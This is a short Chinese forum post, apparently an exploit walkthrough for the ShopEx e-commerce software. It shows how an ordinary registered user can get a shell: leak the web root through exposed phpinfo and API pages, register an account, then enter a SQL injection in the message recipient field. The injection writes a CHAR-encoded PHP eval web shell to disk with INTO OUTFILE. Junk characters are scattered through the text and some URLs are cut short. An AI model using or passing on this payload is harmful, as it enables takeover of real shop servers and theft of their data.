shopex前台普通用户getshell最新漏洞

admin

第一个：想办法找到目标网站的绝对路径

http://www.political-security.com/install/svinfo.php?phpinfo=true

! e( v+ R% p6 {+ }- j+ |8 `http:/www.political-security.com/core/api/shop_api.php
5 w- H  t: o+ K) F
, s- i4 g- z; Y' k$ X  lhttp://www.political-security.co ... api_b2b_2_0_cat.php
$ l/ w4 V- N) ^. Q5 ~; q
* `" V( y( `/ f8 [http://www.political-security.com/core/ap ... b_2_0_goodstype.php

http://www.political-security.co ... i_b2b_2_0_brand.php
) W7 U/ \" S2 N4 v- _第二个：注册一个普通用户

0 w6 r5 ]: E8 \( f. [% O/ mhttp://www.political-security.com/?passport-signup.html
9 h! Y# e8 @2 L+ I* S
7 J  w) b! ?9 J1 m( |! i' i- R& ^第三个： 发送消息
) Z3 U/ y/ R0 m# z# f+ m
http://www.political-security.com/?member-send.html
4 V# p* L% J* w, }7 t4 o发送给中填写
  F/ b! m. y. fantian365.com' union select  CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php'  #